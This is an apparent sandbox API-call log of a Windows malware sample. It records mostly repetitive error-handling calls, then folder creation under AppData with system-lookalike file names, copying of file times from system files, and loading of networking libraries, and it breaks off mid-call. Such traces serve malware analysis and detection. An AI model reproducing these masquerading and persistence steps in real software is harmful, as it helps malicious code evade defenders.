\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x16f0c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿõÐgôüó\x16", lpUsedDefaultChar=0x0) returned 256 [0034.934] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.934] GetLastError () returned 0x0 [0034.934] SetLastError (dwErrCode=0x0) [0034.934] GetLastError () returned 0x0 [0034.934] SetLastError (dwErrCode=0x0) [0034.934] GetLastError () returned 0x0 [0034.934] SetLastError (dwErrCode=0x0) [0034.934] GetLastError () returned 0x0 [0034.934] SetLastError (dwErrCode=0x0) [0034.934] GetLastError () returned 0x0 [0034.934] SetLastError (dwErrCode=0x0) [0034.934] GetLastError () returned 0x0 [0034.935] SetLastError (dwErrCode=0x0) [0034.935] GetLastError () returned 0x0 [0034.935] SetLastError (dwErrCode=0x0) [0034.935] GetLastError () returned 0x0 [0034.935] SetLastError (dwErrCode=0x0) [0034.935] GetLastError () returned 0x0 [0034.935] SetLastError (dwErrCode=0x0) [0034.935] GetLastError () returned 0x0 [0034.935] SetLastError (dwErrCode=0x0) [0034.935] GetLastError () returned 0x0 [0034.935] SetLastError (dwErrCode=0x0) [0034.935] GetLastError () returned 0x0 [0034.935] SetLastError (dwErrCode=0x0) [0034.935] GetLastError () returned 0x0 [0034.935] SetLastError (dwErrCode=0x0) [0034.935] GetLastError () returned 0x0 [0034.935] SetLastError (dwErrCode=0x0) [0034.935] GetLastError () returned 0x0 [0034.935] SetLastError (dwErrCode=0x0) [0034.935] GetLastError () returned 0x0 [0034.935] SetLastError (dwErrCode=0x0) [0034.935] GetLastError () returned 0x0 [0034.935] SetLastError (dwErrCode=0x0) [0034.935] GetLastError () returned 0x0 [0034.936] SetLastError (dwErrCode=0x0) [0034.936] GetLastError () returned 0x0 [0034.936] SetLastError (dwErrCode=0x0) [0034.936] GetLastError () returned 0x0 [0034.936] SetLastError (dwErrCode=0x0) [0034.936] GetLastError () returned 0x0 [0034.936] SetLastError (dwErrCode=0x0) [0034.936] GetLastError () returned 0x0 [0034.936] SetLastError (dwErrCode=0x0) [0034.936] GetLastError () returned 0x0 [0034.936] SetLastError (dwErrCode=0x0) [0034.936] GetLastError () returned 0x0 [0034.936] SetLastError (dwErrCode=0x0) [0034.936] GetLastError () returned 0x0 [0034.936] SetLastError (dwErrCode=0x0) [0034.936] GetLastError () returned 0x0 [0034.936] SetLastError (dwErrCode=0x0) [0034.936] GetLastError () returned 0x0 [0034.936] SetLastError (dwErrCode=0x0) [0034.936] GetLastError () returned 0x0 [0034.936] SetLastError (dwErrCode=0x0) [0034.936] GetLastError () returned 0x0 [0034.936] SetLastError (dwErrCode=0x0) [0034.936] GetLastError () returned 0x0 [0034.937] SetLastError (dwErrCode=0x0) [0034.937] GetLastError () returned 0x0 [0034.937] SetLastError (dwErrCode=0x0) [0034.937] GetLastError () returned 0x0 [0034.937] SetLastError (dwErrCode=0x0) [0034.937] GetLastError () returned 0x0 [0034.937] SetLastError (dwErrCode=0x0) [0034.937] GetLastError () returned 0x0 [0034.937] SetLastError (dwErrCode=0x0) [0034.937] GetLastError () returned 0x0 [0034.937] SetLastError (dwErrCode=0x0) [0034.937] GetLastError () returned 0x0 [0034.937] SetLastError (dwErrCode=0x0) [0034.937] GetLastError () returned 0x0 [0034.937] SetLastError (dwErrCode=0x0) [0034.937] GetLastError () returned 0x0 [0034.937] SetLastError (dwErrCode=0x0) [0034.937] GetLastError () returned 0x0 [0034.937] SetLastError (dwErrCode=0x0) [0034.937] GetLastError () returned 0x0 [0034.937] SetLastError (dwErrCode=0x0) [0034.937] GetLastError () returned 0x0 [0034.937] SetLastError (dwErrCode=0x0) [0034.937] GetLastError () returned 0x0 [0034.937] SetLastError (dwErrCode=0x0) [0034.938] GetLastError () returned 0x0 [0034.938] SetLastError (dwErrCode=0x0) [0034.938] GetLastError () returned 0x0 [0034.938] SetLastError (dwErrCode=0x0) [0034.938] GetLastError () returned 0x0 [0034.938] SetLastError (dwErrCode=0x0) [0034.938] GetLastError () returned 0x0 [0034.938] SetLastError (dwErrCode=0x0) [0034.938] GetLastError () returned 0x0 [0034.938] SetLastError (dwErrCode=0x0) [0034.938] GetLastError () returned 0x0 [0034.938] SetLastError (dwErrCode=0x0) [0034.938] GetLastError () returned 0x0 [0034.938] SetLastError (dwErrCode=0x0) [0034.938] GetLastError () returned 0x0 [0034.938] SetLastError (dwErrCode=0x0) [0034.938] GetLastError () returned 0x0 [0034.938] SetLastError (dwErrCode=0x0) [0034.938] GetLastError () returned 0x0 [0034.938] SetLastError (dwErrCode=0x0) [0034.938] GetLastError () returned 0x0 [0034.938] SetLastError (dwErrCode=0x0) [0034.938] GetLastError () returned 0x0 [0034.938] SetLastError (dwErrCode=0x0) [0034.938] GetLastError () returned 0x0 [0034.939] SetLastError (dwErrCode=0x0) [0034.939] GetLastError () returned 0x0 [0034.939] SetLastError (dwErrCode=0x0) [0034.939] GetLastError () returned 0x0 [0034.939] SetLastError (dwErrCode=0x0) [0034.939] GetLastError () returned 0x0 [0034.939] SetLastError (dwErrCode=0x0) [0034.939] GetLastError () returned 0x0 [0034.939] SetLastError (dwErrCode=0x0) [0034.939] GetLastError () returned 0x0 [0034.939] SetLastError (dwErrCode=0x0) [0034.939] GetLastError () returned 0x0 [0034.939] SetLastError (dwErrCode=0x0) [0034.939] GetLastError () returned 0x0 [0034.939] SetLastError (dwErrCode=0x0) [0034.939] GetLastError () returned 0x0 [0034.939] SetLastError (dwErrCode=0x0) [0034.939] GetLastError () returned 0x0 [0034.939] SetLastError (dwErrCode=0x0) [0034.939] GetLastError () returned 0x0 [0034.939] SetLastError (dwErrCode=0x0) [0034.939] GetLastError () returned 0x0 [0034.939] SetLastError (dwErrCode=0x0) [0034.939] GetLastError () returned 0x0 [0034.940] SetLastError (dwErrCode=0x0) [0034.940] GetLastError () returned 0x0 [0034.940] SetLastError (dwErrCode=0x0) [0034.940] GetLastError () returned 0x0 [0034.940] SetLastError (dwErrCode=0x0) [0034.940] GetLastError () returned 0x0 [0034.940] SetLastError (dwErrCode=0x0) [0034.940] GetLastError () returned 0x0 [0034.940] SetLastError (dwErrCode=0x0) [0034.940] GetLastError () returned 0x0 [0034.940] SetLastError (dwErrCode=0x0) [0034.940] GetLastError () returned 0x0 [0034.940] SetLastError (dwErrCode=0x0) [0034.940] GetLastError () returned 0x0 [0034.940] SetLastError (dwErrCode=0x0) [0034.940] GetLastError () returned 0x0 [0034.940] SetLastError (dwErrCode=0x0) [0034.940] GetLastError () returned 0x0 [0034.940] SetLastError (dwErrCode=0x0) [0034.940] GetLastError () returned 0x0 [0034.940] SetLastError (dwErrCode=0x0) [0034.940] GetLastError () returned 0x0 [0034.940] SetLastError (dwErrCode=0x0) [0034.940] GetLastError () returned 0x0 [0034.940] SetLastError (dwErrCode=0x0) [0034.941] GetLastError () returned 0x0 [0034.941] SetLastError (dwErrCode=0x0) [0034.941] GetLastError () returned 0x0 [0034.941] SetLastError (dwErrCode=0x0) [0034.941] GetLastError () returned 0x0 [0034.941] SetLastError (dwErrCode=0x0) [0034.941] GetLastError () returned 0x0 [0034.941] SetLastError (dwErrCode=0x0) [0034.941] GetLastError () returned 0x0 [0034.941] SetLastError (dwErrCode=0x0) [0034.941] GetLastError () returned 0x0 [0034.941] SetLastError (dwErrCode=0x0) [0034.941] GetLastError () returned 0x0 [0034.941] SetLastError (dwErrCode=0x0) [0034.941] GetLastError () returned 0x0 [0034.941] SetLastError (dwErrCode=0x0) [0034.941] GetLastError () returned 0x0 [0034.941] SetLastError (dwErrCode=0x0) [0034.941] GetLastError () returned 0x0 [0034.941] SetLastError (dwErrCode=0x0) [0034.941] GetLastError () returned 0x0 [0034.941] SetLastError (dwErrCode=0x0) [0034.941] GetLastError () returned 0x0 [0034.941] SetLastError (dwErrCode=0x0) [0034.941] GetLastError () returned 0x0 [0034.941] SetLastError (dwErrCode=0x0) [0034.942] GetLastError () returned 0x0 [0034.942] SetLastError (dwErrCode=0x0) [0034.942] GetLastError () returned 0x0 [0034.942] SetLastError (dwErrCode=0x0) [0034.942] GetLastError () returned 0x0 [0034.942] SetLastError (dwErrCode=0x0) [0034.942] GetLastError () returned 0x0 [0034.942] SetLastError (dwErrCode=0x0) [0034.942] GetLastError () returned 0x0 [0034.942] SetLastError (dwErrCode=0x0) [0034.942] GetLastError () returned 0x0 [0034.942] SetLastError (dwErrCode=0x0) [0034.942] GetLastError () returned 0x0 [0034.942] SetLastError (dwErrCode=0x0) [0034.942] GetLastError () returned 0x0 [0034.942] SetLastError (dwErrCode=0x0) [0034.942] GetLastError () returned 0x0 [0034.942] SetLastError (dwErrCode=0x0) [0034.942] GetLastError () returned 0x0 [0034.942] SetLastError (dwErrCode=0x0) [0034.942] GetLastError () returned 0x0 [0034.942] SetLastError (dwErrCode=0x0) [0034.942] GetLastError () returned 0x0 [0034.942] SetLastError (dwErrCode=0x0) [0034.942] GetLastError () returned 0x0 [0034.943] SetLastError (dwErrCode=0x0) [0034.943] GetLastError () returned 0x0 [0034.943] SetLastError (dwErrCode=0x0) [0034.943] GetLastError () returned 0x0 [0034.943] SetLastError (dwErrCode=0x0) [0034.943] GetLastError () returned 0x0 [0034.943] SetLastError (dwErrCode=0x0) [0034.943] GetLastError () returned 0x0 [0034.950] SetLastError (dwErrCode=0x0) [0034.950] GetLastError () returned 0x0 [0034.950] SetLastError (dwErrCode=0x0) [0034.950] GetLastError () returned 0x0 [0034.950] SetLastError (dwErrCode=0x0) [0034.950] GetLastError () returned 0x0 [0034.951] SetLastError (dwErrCode=0x0) [0034.951] GetLastError () returned 0x0 [0034.951] SetLastError (dwErrCode=0x0) [0034.951] GetLastError () returned 0x0 [0034.951] SetLastError (dwErrCode=0x0) [0034.951] GetLastError () returned 0x0 [0034.951] SetLastError (dwErrCode=0x0) [0034.951] GetLastError () returned 0x0 [0034.951] SetLastError (dwErrCode=0x0) [0034.951] GetLastError () returned 0x0 [0034.951] SetLastError (dwErrCode=0x0) [0034.951] GetLastError () returned 0x0 [0034.951] SetLastError (dwErrCode=0x0) [0034.951] GetLastError () returned 0x0 [0034.951] SetLastError (dwErrCode=0x0) [0034.951] GetLastError () returned 0x0 [0034.951] SetLastError (dwErrCode=0x0) [0034.951] GetLastError () returned 0x0 [0034.951] SetLastError (dwErrCode=0x0) [0034.951] GetLastError () returned 0x0 [0034.951] SetLastError (dwErrCode=0x0) [0034.951] GetLastError () returned 0x0 [0034.951] SetLastError (dwErrCode=0x0) [0034.951] GetLastError () returned 0x0 [0034.951] SetLastError (dwErrCode=0x0) [0034.951] GetLastError () returned 0x0 [0034.951] SetLastError (dwErrCode=0x0) [0034.951] GetLastError () returned 0x0 [0034.951] SetLastError (dwErrCode=0x0) [0034.951] GetLastError () returned 0x0 [0034.951] SetLastError (dwErrCode=0x0) [0034.951] GetLastError () returned 0x0 [0034.951] SetLastError (dwErrCode=0x0) [0034.951] GetLastError () returned 0x0 [0034.952] SetLastError (dwErrCode=0x0) [0034.952] GetLastError () returned 0x0 [0034.952] SetLastError (dwErrCode=0x0) [0034.952] GetLastError () returned 0x0 [0034.952] SetLastError (dwErrCode=0x0) [0034.952] GetLastError () returned 0x0 [0034.952] SetLastError (dwErrCode=0x0) [0034.952] GetLastError () returned 0x0 [0034.952] SetLastError (dwErrCode=0x0) [0034.952] GetLastError () returned 0x0 [0034.952] SetLastError (dwErrCode=0x0) [0034.952] GetLastError () returned 0x0 [0034.952] SetLastError (dwErrCode=0x0) [0034.952] GetLastError () returned 0x0 [0034.952] SetLastError (dwErrCode=0x0) [0034.952] GetLastError () returned 0x0 [0034.952] SetLastError (dwErrCode=0x0) [0034.952] GetLastError () returned 0x0 [0034.952] SetLastError (dwErrCode=0x0) [0034.952] GetLastError () returned 0x0 [0034.952] SetLastError (dwErrCode=0x0) [0034.952] GetLastError () returned 0x0 [0034.952] SetLastError (dwErrCode=0x0) [0034.952] GetLastError () returned 0x0 [0034.952] SetLastError (dwErrCode=0x0) [0034.952] GetLastError () returned 0x0 [0034.952] SetLastError (dwErrCode=0x0) [0034.952] GetLastError () returned 0x0 [0034.952] SetLastError (dwErrCode=0x0) [0034.952] GetLastError () returned 0x0 [0034.952] SetLastError (dwErrCode=0x0) [0034.952] GetLastError () returned 0x0 [0034.952] SetLastError (dwErrCode=0x0) [0034.952] GetLastError () returned 0x0 [0034.953] SetLastError (dwErrCode=0x0) [0034.953] GetLastError () returned 0x0 [0034.953] SetLastError (dwErrCode=0x0) [0034.953] GetLastError () returned 0x0 [0034.953] SetLastError (dwErrCode=0x0) [0034.953] GetLastError () returned 0x0 [0034.953] SetLastError (dwErrCode=0x0) [0034.953] GetLastError () returned 0x0 [0034.953] SetLastError (dwErrCode=0x0) [0034.953] GetLastError () returned 0x0 [0034.953] SetLastError (dwErrCode=0x0) [0034.953] GetLastError () returned 0x0 [0034.953] SetLastError (dwErrCode=0x0) [0034.953] GetLastError () returned 0x0 [0034.953] SetLastError (dwErrCode=0x0) [0034.953] GetLastError () returned 0x0 [0034.953] SetLastError (dwErrCode=0x0) [0034.953] GetLastError () returned 0x0 [0034.953] SetLastError (dwErrCode=0x0) [0034.953] GetLastError () returned 0x0 [0034.953] SetLastError (dwErrCode=0x0) [0034.953] GetLastError () returned 0x0 [0034.953] SetLastError (dwErrCode=0x0) [0034.953] GetLastError () returned 0x0 [0034.953] SetLastError (dwErrCode=0x0) [0034.953] GetLastError () returned 0x0 [0034.953] SetLastError (dwErrCode=0x0) [0034.953] GetLastError () returned 0x0 [0034.953] SetLastError (dwErrCode=0x0) [0034.953] GetLastError () returned 0x0 [0034.953] SetLastError (dwErrCode=0x0) [0034.953] GetLastError () returned 0x0 [0034.953] SetLastError (dwErrCode=0x0) [0034.953] GetLastError () returned 0x0 [0034.954] SetLastError (dwErrCode=0x0) [0034.954] GetLastError () returned 0x0 [0034.954] SetLastError (dwErrCode=0x0) [0034.954] GetLastError () returned 0x0 [0034.954] SetLastError (dwErrCode=0x0) [0034.954] GetLastError () returned 0x0 [0034.954] SetLastError (dwErrCode=0x0) [0034.954] GetLastError () returned 0x0 [0034.954] SetLastError (dwErrCode=0x0) [0034.954] GetLastError () returned 0x0 [0034.954] SetLastError (dwErrCode=0x0) [0034.954] GetLastError () returned 0x0 [0034.954] SetLastError (dwErrCode=0x0) [0034.954] GetLastError () returned 0x0 [0034.954] SetLastError (dwErrCode=0x0) [0034.954] GetLastError () returned 0x0 [0034.954] SetLastError (dwErrCode=0x0) [0034.954] GetLastError () returned 0x0 [0034.954] SetLastError (dwErrCode=0x0) [0034.954] GetLastError () returned 0x0 [0034.954] SetLastError (dwErrCode=0x0) [0034.954] GetLastError () returned 0x0 [0034.954] SetLastError (dwErrCode=0x0) [0034.954] GetLastError () returned 0x0 [0034.954] SetLastError (dwErrCode=0x0) [0034.954] GetLastError () returned 0x0 [0034.954] SetLastError (dwErrCode=0x0) [0034.954] GetLastError () returned 0x0 [0034.954] SetLastError (dwErrCode=0x0) [0034.954] GetLastError () returned 0x0 [0034.954] SetLastError (dwErrCode=0x0) [0034.954] GetLastError () returned 0x0 [0034.954] SetLastError (dwErrCode=0x0) [0034.954] GetLastError () returned 0x0 [0034.955] SetLastError (dwErrCode=0x0) [0034.955] GetLastError () returned 0x0 [0034.955] SetLastError (dwErrCode=0x0) [0034.955] GetLastError () returned 0x0 [0034.955] SetLastError (dwErrCode=0x0) [0034.955] GetLastError () returned 0x0 [0034.955] SetLastError (dwErrCode=0x0) [0034.955] GetLastError () returned 0x0 [0034.955] SetLastError (dwErrCode=0x0) [0034.955] GetLastError () returned 0x0 [0034.955] SetLastError (dwErrCode=0x0) [0034.955] GetLastError () returned 0x0 [0034.955] SetLastError (dwErrCode=0x0) [0034.955] GetLastError () returned 0x0 [0034.955] SetLastError (dwErrCode=0x0) [0034.955] GetLastError () returned 0x0 [0034.955] SetLastError (dwErrCode=0x0) [0034.955] GetLastError () returned 0x0 [0034.955] SetLastError (dwErrCode=0x0) [0034.955] GetLastError () returned 0x0 [0034.955] SetLastError (dwErrCode=0x0) [0034.955] GetLastError () returned 0x0 [0034.955] SetLastError (dwErrCode=0x0) [0034.955] GetLastError () returned 0x0 [0034.955] SetLastError (dwErrCode=0x0) [0034.955] GetLastError () returned 0x0 [0034.955] SetLastError (dwErrCode=0x0) [0034.955] GetLastError () returned 0x0 [0034.955] SetLastError (dwErrCode=0x0) [0034.955] GetLastError () returned 0x0 [0034.955] SetLastError (dwErrCode=0x0) [0034.955] GetLastError () returned 0x0 [0034.955] SetLastError (dwErrCode=0x0) [0034.955] GetLastError () returned 0x0 [0034.956] SetLastError (dwErrCode=0x0) [0034.956] GetLastError () returned 0x0 [0034.956] SetLastError (dwErrCode=0x0) [0034.956] GetLastError () returned 0x0 [0034.956] SetLastError (dwErrCode=0x0) [0034.956] GetLastError () returned 0x0 [0034.956] SetLastError (dwErrCode=0x0) [0034.956] GetLastError () returned 0x0 [0034.956] SetLastError (dwErrCode=0x0) [0034.956] GetLastError () returned 0x0 [0034.956] SetLastError (dwErrCode=0x0) [0034.956] GetLastError () returned 0x0 [0034.956] SetLastError (dwErrCode=0x0) [0034.956] GetLastError () returned 0x0 [0034.956] SetLastError (dwErrCode=0x0) [0034.956] GetLastError () returned 0x0 [0034.956] SetLastError (dwErrCode=0x0) [0034.956] GetLastError () returned 0x0 [0034.956] SetLastError (dwErrCode=0x0) [0034.956] GetLastError () returned 0x0 [0034.956] SetLastError (dwErrCode=0x0) [0034.956] GetLastError () returned 0x0 [0034.956] SetLastError (dwErrCode=0x0) [0034.956] GetLastError () returned 0x0 [0034.956] SetLastError (dwErrCode=0x0) [0034.956] GetLastError () returned 0x0 [0034.956] SetLastError (dwErrCode=0x0) [0034.956] GetLastError () returned 0x0 [0034.956] SetLastError (dwErrCode=0x0) [0034.956] GetLastError () returned 0x0 [0034.956] SetLastError (dwErrCode=0x0) [0034.956] GetLastError () returned 0x0 [0034.956] SetLastError (dwErrCode=0x0) [0034.956] GetLastError () returned 0x0 [0034.957] SetLastError (dwErrCode=0x0) [0034.957] GetLastError () returned 0x0 [0034.957] SetLastError (dwErrCode=0x0) [0034.957] GetLastError () returned 0x0 [0034.957] SetLastError (dwErrCode=0x0) [0034.957] GetLastError () returned 0x0 [0034.957] SetLastError (dwErrCode=0x0) [0034.957] GetLastError () returned 0x0 [0034.957] SetLastError (dwErrCode=0x0) [0034.957] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0034.957] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0034.957] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0034.958] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f440 | out: lpSystemTimeAsFileTime=0x16f440*(dwLowDateTime=0xe2849070, dwHighDateTime=0x1d3dfba)) [0034.959] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16f378, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.959] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16f260, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.959] GetLastError () returned 0x0 [0034.959] GetLastError () returned 0x0 [0034.959] GetLastError () returned 0x0 [0034.959] GetLastError () returned 0x0 [0034.959] GetLastError () returned 0x0 [0034.959] GetLastError () returned 0x0 [0034.959] GetLastError () returned 0x0 [0034.959] GetLastError () returned 0x0 [0034.959] GetLastError () returned 0x0 [0034.959] GetLastError () returned 0x0 [0034.959] GetLastError () returned 0x0 [0034.959] GetLastError () returned 0x0 [0034.959] GetLastError () returned 0x0 [0034.959] GetLastError () returned 0x0 [0034.959] GetLastError () returned 0x0 [0034.959] GetLastError () returned 0x0 [0034.959] GetLastError () returned 0x0 [0034.959] GetLastError () returned 0x0 [0034.959] GetLastError () returned 0x0 [0034.959] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.960] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0034.960] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.960] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.960] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.960] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.960] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0034.960] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0034.960] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0034.960] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0034.960] GetLastError () returned 0xb7 [0034.960] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.960] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0034.960] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0034.960] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0034.960] wsprintfA (in: param_1=0x16f0e0, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.960] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0034.960] wsprintfA (in: param_1=0x16efdc, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.960] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.960] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0034.961] CloseHandle (hObject=0x74) returned 1 [0034.961] GetLastError () returned 0x0 [0034.961] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0034.961] GetLastError () returned 0x0 [0034.961] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0034.961] GetSystemDirectoryA (in: lpBuffer=0x16f0e0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.961] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.961] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0034.961] CloseHandle (hObject=0x74) returned 1 [0034.961] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.961] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.961] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0034.963] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.963] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0034.963] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0034.963] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0034.963] GetProcAddress 